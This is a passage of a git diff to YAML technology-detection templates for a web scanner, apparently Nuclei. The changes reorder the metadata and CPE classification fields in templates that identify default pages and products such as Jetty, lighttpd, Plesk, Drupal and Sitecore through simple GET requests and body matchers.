- shodan-query: http.title:"Test Page for the HTTP Server on Fedora"
- product: fedora
- vendor: fedoraproject
- tags: tech,fedora
-
classification:
cpe: cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: fedoraproject
+ product: fedora
+ shodan-query: http.title:"Test Page for the HTTP Server on Fedora"
+ tags: tech,fedora
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- 'Test Page for the HTTP Server on Fedora '
part: body
-# digest: 490a0046304402200b6a1d0c3d7b5cb4af003fd8709013d9a477d6c455e55f82949e22cd2c5d12670220786bd0fe6b258195168e5d0cc0f358b5fa0d5cb3f2b2f66fff24f42ffcff4972:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200b6a1d0c3d7b5cb4af003fd8709013d9a477d6c455e55f82949e22cd2c5d12670220786bd0fe6b258195168e5d0cc0f358b5fa0d5cb3f2b2f66fff24f42ffcff4972:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-glassfish-server-page.yaml b/http/technologies/default-glassfish-server-page.yaml
index 853900b5e5..e9441a9e22 100644
--- a/http/technologies/default-glassfish-server-page.yaml
+++ b/http/technologies/default-glassfish-server-page.yaml
@@ -4,15 +4,15 @@ info:
name: GlassFish Server Default Page
author: dhiyaneshDk,righettod
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"GlassFish Server - Server Running"
- product: glassfish_server
- vendor: oracle
- tags: tech,glassfish
-
classification:
cpe: cpe:2.3:a:oracle:glassfish_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: oracle
+ product: glassfish_server
+ shodan-query: http.title:"GlassFish Server - Server Running"
+ tags: tech,glassfish
+
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
group: 1
regex:
- 'GlassFish\s+Server\s+([A-Za-z0-9\s.]+)(\n|\r)'
-# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml
index 7a4fe3ccac..288ebd41d8 100644
--- a/http/technologies/default-jetty-page.yaml
+++ b/http/technologies/default-jetty-page.yaml
@@ -4,15 +4,15 @@ info:
name: Jetty Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Powered By Jetty"
- product: jetty
- vendor: eclipse
- tags: tech,jetty
-
classification:
cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: eclipse
+ product: jetty
+ shodan-query: http.title:"Powered By Jetty"
+ tags: tech,jetty
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Powered By Jetty "
part: body
-# digest: 4a0a0047304502200fe50eaa793d32dd59108293fef120b82b4891e7b389e2a3ebe8809c8112e92a022100ebd2558f29c92cba41b19a0f0ea3e022823a3f3efdc75460ab820e94250b2443:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200fe50eaa793d32dd59108293fef120b82b4891e7b389e2a3ebe8809c8112e92a022100ebd2558f29c92cba41b19a0f0ea3e022823a3f3efdc75460ab820e94250b2443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml
index 5018ad8e07..46f74f20d4 100644
--- a/http/technologies/default-lighttpd-page.yaml
+++ b/http/technologies/default-lighttpd-page.yaml
@@ -4,15 +4,15 @@ info:
name: lighttpd Default Page
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Powered by lighttpd"
- product: lighttpd
- vendor: lighttpd
- tags: tech,lighttpd
-
classification:
cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: lighttpd
+ product: lighttpd
+ shodan-query: http.title:"Powered by lighttpd"
+ tags: tech,lighttpd
+
http:
- method: GET
path:
@@ -28,4 +28,4 @@ http:
status:
- 200
-# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-lighttpd-placeholder-page.yaml b/http/technologies/default-lighttpd-placeholder-page.yaml
index c8e84f9d3d..b651d28922 100644
--- a/http/technologies/default-lighttpd-placeholder-page.yaml
+++ b/http/technologies/default-lighttpd-placeholder-page.yaml
@@ -4,15 +4,15 @@ info:
name: Lighttpd Placeholder Page
author: idealphase
severity: info
- metadata:
- max-request: 1
- shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself"
- product: lighttpd
- vendor: lighttpd
- tags: tech,lighttpd
-
classification:
cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: lighttpd
+ product: lighttpd
+ shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself"
+ tags: tech,lighttpd
+
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 490a0046304402207bbd50cbd24cbdba72b8ed88f7a98e3ba3ac7ba2ead08b276f42d7a713e59c0f022007f8916863aab5b425262574a27ec9a198ac6366682cd883ff50101063639a37:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207bbd50cbd24cbdba72b8ed88f7a98e3ba3ac7ba2ead08b276f42d7a713e59c0f022007f8916863aab5b425262574a27ec9a198ac6366682cd883ff50101063639a37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml
index 9ccc875f22..bfd0a7f48a 100644
--- a/http/technologies/default-movable-page.yaml
+++ b/http/technologies/default-movable-page.yaml
@@ -4,6 +4,8 @@ info:
name: Movable Default Page
author: dhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Welcome to Movable Type"
@@ -11,8 +13,6 @@ info:
vendor: sixapart
tags: tech,movable
- classification:
- cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/default-openresty.yaml b/http/technologies/default-openresty.yaml
index a092058f93..4ee7974e06 100644
--- a/http/technologies/default-openresty.yaml
+++ b/http/technologies/default-openresty.yaml
@@ -4,15 +4,15 @@ info:
name: OpenResty Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Welcome to OpenResty!"
- product: openresty
- vendor: openresty
- tags: tech,openresty
-
classification:
cpe: cpe:2.3:a:openresty:openresty:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: openresty
+ product: openresty
+ shodan-query: http.title:"Welcome to OpenResty!"
+ tags: tech,openresty
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Welcome to OpenResty! "
part: body
-# digest: 4a0a0047304502203d2e8200dac9b663ecac011e4a3f12f86ed21dff7384a7c66e06a5fcfb1c2b790221008c60b1d9ec24d2701fa9c03a580c52ea699fea0172e454874ca783f2da28ff72:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203d2e8200dac9b663ecac011e4a3f12f86ed21dff7384a7c66e06a5fcfb1c2b790221008c60b1d9ec24d2701fa9c03a580c52ea699fea0172e454874ca783f2da28ff72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml
index e14c8839d0..f6540101ff 100644
--- a/http/technologies/default-parallels-plesk.yaml
+++ b/http/technologies/default-parallels-plesk.yaml
@@ -4,16 +4,16 @@ info:
name: Default Parallels Plesk Panel Page
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Default Parallels Plesk Panel Page"
- product: parallels_plesk_panel
vendor: parallels
+ product: parallels_plesk_panel
+ shodan-query: title:"Default Parallels Plesk Panel Page"
tags: tech,default-page,parallels,plesk
- classification:
- cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100f5ef50f41341320ce1aa65b364bc353b9f52a53ebe15ce8d7c3e69c8d6d82a75022100d960f2065565be892a9552a1836ae9ceba87fe0c513b8850da96ab118a9cf6c5:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f5ef50f41341320ce1aa65b364bc353b9f52a53ebe15ce8d7c3e69c8d6d82a75022100d960f2065565be892a9552a1836ae9ceba87fe0c513b8850da96ab118a9cf6c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-payara-server-page.yaml b/http/technologies/default-payara-server-page.yaml
index 2ed4b84138..91094eb300 100644
--- a/http/technologies/default-payara-server-page.yaml
+++ b/http/technologies/default-payara-server-page.yaml
@@ -4,15 +4,15 @@ info:
name: Payara Server Default Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Payara Server - Server Running"
- product: payara
- vendor: payara
- tags: tech,payara
-
classification:
cpe: cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: payara
+ product: payara
+ shodan-query: http.title:"Payara Server - Server Running"
+ tags: tech,payara
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Payara Server - Server Running "
part: body
-# digest: 490a00463044022030e0025b825e09cf993dbb12d9d234cec3e0176fd7be502944868f91204daf5a02206543383c7d33d1be4fe6621cd8a9fbdf714057d2d784c4d5e9c05c01aa26e1ed:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022030e0025b825e09cf993dbb12d9d234cec3e0176fd7be502944868f91204daf5a02206543383c7d33d1be4fe6621cd8a9fbdf714057d2d784c4d5e9c05c01aa26e1ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-plesk-page.yaml b/http/technologies/default-plesk-page.yaml
index fea9338d75..108e714e1f 100644
--- a/http/technologies/default-plesk-page.yaml
+++ b/http/technologies/default-plesk-page.yaml
@@ -4,15 +4,15 @@ info:
name: Plesk Default Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Web Server's Default Page"
- product: plesk
- vendor: plesk
- tags: tech,plesk
-
classification:
cpe: cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: plesk
+ product: plesk
+ shodan-query: http.title:"Web Server's Default Page"
+ tags: tech,plesk
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Web Server's Default Page "
part: body
-# digest: 490a0046304402204a1382a42c6858f9637b333b97d69cfe08532b4853be93c995372384477f61e90220259c322c2aca3af8714bf2ea87f723794b07f29fc1da51803b78af38f48fc599:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204a1382a42c6858f9637b333b97d69cfe08532b4853be93c995372384477f61e90220259c322c2aca3af8714bf2ea87f723794b07f29fc1da51803b78af38f48fc599:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-redhat-test-page.yaml b/http/technologies/default-redhat-test-page.yaml
index 31132dadd3..e6a4e88bea 100644
--- a/http/technologies/default-redhat-test-page.yaml
+++ b/http/technologies/default-redhat-test-page.yaml
@@ -4,15 +4,15 @@ info:
name: Red Hat Enterprise Linux Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
- product: enterprise_linux_server
- vendor: redhat
- tags: tech,redhat
-
classification:
cpe: cpe:2.3:o:redhat:enterprise_linux_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: redhat
+ product: enterprise_linux_server
+ shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
+ tags: tech,redhat
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux "
part: body
-# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml
index e3ac33528e..c25b4eb326 100644
--- a/http/technologies/default-sitecore-page.yaml
+++ b/http/technologies/default-sitecore-page.yaml
@@ -8,16 +8,16 @@ info:
Detect Sitecore Content Management System (CMS).
reference: |
https://www.sitecore.com/
+ classification:
+ cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Welcome to Sitecore"
- product: experience_platform
vendor: sitecore
+ product: experience_platform
+ shodan-query: http.title:"Welcome to Sitecore"
tags: tech,sitecore,cms
- classification:
- cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 490a0046304402206b0002615fd8de5ad50ccbe0fbff31092eaf902cab71b4e408f60f08052df1a202206e16fd0e04ce91761ab29cd8c268939227f39a6494925175e6775305051000f5:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206b0002615fd8de5ad50ccbe0fbff31092eaf902cab71b4e408f60f08052df1a202206e16fd0e04ce91761ab29cd8c268939227f39a6494925175e6775305051000f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-ssltls-test-page.yaml b/http/technologies/default-ssltls-test-page.yaml
index b58249d4ec..4467a700b5 100644
--- a/http/technologies/default-ssltls-test-page.yaml
+++ b/http/technologies/default-ssltls-test-page.yaml
@@ -4,15 +4,15 @@ info:
name: SSL/TLS-aware Test Page
author: dhiyaneshDk
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site"
- product: http_server
- vendor: apache
- tags: tech,ssltls
-
classification:
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: apache
+ product: http_server
+ shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site"
+ tags: tech,ssltls
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
- "Test Page for the SSL/TLS-aware Apache Installation on Web Site "
part: body
-# digest: 4a0a00473045022052db37eee2144325d27e85820b54b42327f31fa95a5b4b9b7177ce8d9b524d4e022100fa7cd5b538cd1114c07bf1d59453537b284079200ecdf54e1977e1ca54444784:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022052db37eee2144325d27e85820b54b42327f31fa95a5b4b9b7177ce8d9b524d4e022100fa7cd5b538cd1114c07bf1d59453537b284079200ecdf54e1977e1ca54444784:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml
index ea896920f9..855e78b453 100644
--- a/http/technologies/default-symfony-page.yaml
+++ b/http/technologies/default-symfony-page.yaml
@@ -4,16 +4,16 @@ info:
name: Symfony Default Page
author: pussycat0x
severity: info
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Welcome to Symfony"
- product: symfony
vendor: sensiolabs
+ product: symfony
+ shodan-query: http.title:"Welcome to Symfony"
tags: tech,symfony,default-page
- classification:
- cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
regex:
- "([0-9.]+)"
-# digest: 4a0a00473045022100f64c890cd70b8e53f2cccb4253df4c3b1c391059ffe64a5361212a74aa6c31e102203df7cb56e17415c6653babcd042acb925e05ef4152f342eaef200aa772de1867:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f64c890cd70b8e53f2cccb4253df4c3b1c391059ffe64a5361212a74aa6c31e102203df7cb56e17415c6653babcd042acb925e05ef4152f342eaef200aa772de1867:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml
index 80473654b3..6fe34baa6b 100644
--- a/http/technologies/default-tengine-page.yaml
+++ b/http/technologies/default-tengine-page.yaml
@@ -4,16 +4,16 @@ info:
name: Tengine Default Page
author: pussycat0x
severity: info
+ classification:
+ cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Welcome to tengine"
- product: tengine
vendor: alibaba
+ product: tengine
+ shodan-query: http.title:"Welcome to tengine"
tags: tech,tengine,default-page
- classification:
- cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022061a22a21552586e5cb2d8c629eb94935f7c96e6f2e834ce68b2f529e0b0a3ebb022100b83b357e972f5340bc33371042896ab6e4fc01e24b536970b11f3e33589af970:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022061a22a21552586e5cb2d8c629eb94935f7c96e6f2e834ce68b2f529e0b0a3ebb022100b83b357e972f5340bc33371042896ab6e4fc01e24b536970b11f3e33589af970:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml
index ae95a2ad4a..188df42607 100644
--- a/http/technologies/default-websphere-liberty.yaml
+++ b/http/technologies/default-websphere-liberty.yaml
@@ -4,16 +4,16 @@ info:
name: WebSphere Liberty Default Page
author: oppsec
severity: info
+ classification:
+ cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"WebSphere Liberty"
- product: websphere_liberty
vendor: ibm
+ product: websphere_liberty
+ shodan-query: http.title:"WebSphere Liberty"
tags: tech,websphere,liberty
- classification:
- cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
regex:
- "(WebSphere Liberty).*?([a-zA-Z0-9.-]+)"
-# digest: 4b0a00483046022100c675cf6212578eac4d8bf53307bac4a8945cdf4891c4677bbb024b84c4ea858a0221009226a87945897e1e50379fd245515a95b6b70eec9f55b7f815859d1de3d1dbed:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c675cf6212578eac4d8bf53307bac4a8945cdf4891c4677bbb024b84c4ea858a0221009226a87945897e1e50379fd245515a95b6b70eec9f55b7f815859d1de3d1dbed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml
index 096bbe0aff..2fe2c4f9b8 100644
--- a/http/technologies/devexpress-detect.yaml
+++ b/http/technologies/devexpress-detect.yaml
@@ -9,15 +9,15 @@ info:
reference:
- https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code
- https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it
- metadata:
- max-request: 1
- shodan-query: html:"DXR.axd"
- product: devexpress_components
- vendor: devexpress
- tags: devexpress,iis,microsoft,asp,tech
-
classification:
cpe: cpe:2.3:a:devexpress:devexpress_components:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: devexpress
+ product: devexpress_components
+ shodan-query: html:"DXR.axd"
+ tags: devexpress,iis,microsoft,asp,tech
+
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
part: body
words:
- "DXR.axd"
-# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml
index aae33ae88b..1582d78b5d 100644
--- a/http/technologies/directus-detect.yaml
+++ b/http/technologies/directus-detect.yaml
@@ -8,16 +8,16 @@ info:
Directus is a content manager with dynamic access API generation and transparent integration with the main databases.
reference:
- https://directus.io/
+ classification:
+ cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:*
metadata:
verified: true
max-request: 1
- google-query: 'X-Powered-By: Directus'
- product: directus
vendor: monospace
+ product: directus
+ google-query: 'X-Powered-By: Directus'
tags: tech,directus,detect
- classification:
- cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
words:
- "X-Powered-By: Directus"
case-insensitive: true
-# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml
index f62c0840bc..a4351dbd8f 100644
--- a/http/technologies/drupal-detect.yaml
+++ b/http/technologies/drupal-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Drupal Detection
author: 1nf1n7y
severity: info
+ classification:
+ cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: http.component:"Drupal"
- product: drupal
vendor: drupal
+ product: drupal
+ shodan-query: http.component:"Drupal"
tags: tech,drupal
- classification:
- cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
regex:
- 'class="site-version">([0-9.x-]+)'
-# digest: 490a0046304402206b42e6e66bef90d25a1554d6b8dea3838be21a3a6ce7dbf18a65146e41452be7022051ee7c9657b73164a633a9e41e6a0cdfc4847c9c9aa865908caab233866901b8:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206b42e6e66bef90d25a1554d6b8dea3838be21a3a6ce7dbf18a65146e41452be7022051ee7c9657b73164a633a9e41e6a0cdfc4847c9c9aa865908caab233866901b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/elasticsearch-sql-client-detect.yaml b/http/technologies/elasticsearch-sql-client-detect.yaml
index f27ad1cb17..bd1bbc237e 100644
--- a/http/technologies/elasticsearch-sql-client-detect.yaml
+++ b/http/technologies/elasticsearch-sql-client-detect.yaml
@@ -5,15 +5,15 @@ info:
author: pussycat0x
severity: low
description: Elasticsearch detected SQL client.
- metadata:
- max-request: 1
- shodan-query: http.title:"Elasticsearch-sql client"
- product: elasticsearch
- vendor: elastic
- tags: elasticsearch,tech,sql
-
classification:
cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: elastic
+ product: elasticsearch
+ shodan-query: http.title:"Elasticsearch-sql client"
+ tags: elasticsearch,tech,sql
+
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 490a004630440220276e96734ee9717940ec0f594e445b97d2a87382586b66013d5d53da6eb0c7bf0220305a0bb73e6413ee0b510ff3339532e683b201600f1363c4a8e917c6b41eab47:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220276e96734ee9717940ec0f594e445b97d2a87382586b66013d5d53da6eb0c7bf0220305a0bb73e6413ee0b510ff3339532e683b201600f1363c4a8e917c6b41eab47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/element-web-detect.yaml b/http/technologies/element-web-detect.yaml
index c4f7bce756..ae6297b85f 100644
--- a/http/technologies/element-web-detect.yaml
+++ b/http/technologies/element-web-detect.yaml
@@ -5,16 +5,16 @@ info:
author: davidegirardi
severity: info
description: Identify if a web application is vanilla Element Web and return the version
+ classification:
+ cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"manifest.json"
- product: element
vendor: matrix
+ product: element
+ shodan-query: html:"manifest.json"
tags: tech,matrix,element,detect
- classification:
- cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
part: body
regex:
- '[^\s]+'
-# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/empirecms-detect.yaml b/http/technologies/empirecms-detect.yaml
index 9c8a185704..f802eb2124 100644
--- a/http/technologies/empirecms-detect.yaml
+++ b/http/technologies/empirecms-detect.yaml
@@ -4,15 +4,15 @@ info:
name: EmpireCMS Detect
author: princechaddha
severity: info
- metadata:
- max-request: 1
- shodan-query: http.html:EmpireCMS
- product: empirecms
- vendor: phome
- tags: tech,empirecms
-
classification:
cpe: cpe:2.3:a:phome:empirecms:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: phome
+ product: empirecms
+ shodan-query: http.html:EmpireCMS
+ tags: tech,empirecms
+
http:
- method: GET
path:
@@ -24,4 +24,4 @@ http:
regex:
- ''
-# digest: 4b0a00483046022100e7b0fdbe31101929f3825c65599aa989d9ddea110b1096d2a44f453ace2e65fc022100d5eba571fc451ad5db3a6a7949cc063acc5d57bb2d886054841cb7e6f1b98a45:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e7b0fdbe31101929f3825c65599aa989d9ddea110b1096d2a44f453ace2e65fc022100d5eba571fc451ad5db3a6a7949cc063acc5d57bb2d886054841cb7e6f1b98a45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml
index de519ca79e..fbb54cdcf7 100644
--- a/http/technologies/gitbook-detect.yaml
+++ b/http/technologies/gitbook-detect.yaml
@@ -6,17 +6,17 @@ info:
severity: info
description: GitBook is a collaborative documentation tool that allows anyone to document anything—such as products and APIs—and share knowledge through a user-friendly online platform.
reference: https://www.gitbook.com/
+ classification:
+ cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: gitbook
+ product: gitbook
shodan-query: http.title:"gitbook"
fofa: app="Introduction-GitBook"
- product: gitbook
- vendor: gitbook
tags: tech,gitbook
- classification:
- cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,4 @@ http:
- ''
- '(?m)'
-# digest: 490a00463044022051c8db0d578ee59a851dbbc2792ca3e5dea61176125b543fd9f2f0bc62d160dc02204e865046049fcecf4fcf21561162fa2a03f74407923f5ee40c6259a7cbcfc26a:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022051c8db0d578ee59a851dbbc2792ca3e5dea61176125b543fd9f2f0bc62d160dc02204e865046049fcecf4fcf21561162fa2a03f74407923f5ee40c6259a7cbcfc26a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml
index 610f1afa44..2a5bb6c7d1 100644
--- a/http/technologies/glpi-status-page.yaml
+++ b/http/technologies/glpi-status-page.yaml
@@ -8,16 +8,16 @@ info:
A php status page that indicates if local or ldap identity is used for glpi.
reference:
- https://buildmedia.readthedocs.org/media/pdf/glpi-user-documentation/latest/glpi-user-documentation.pdf
+ classification:
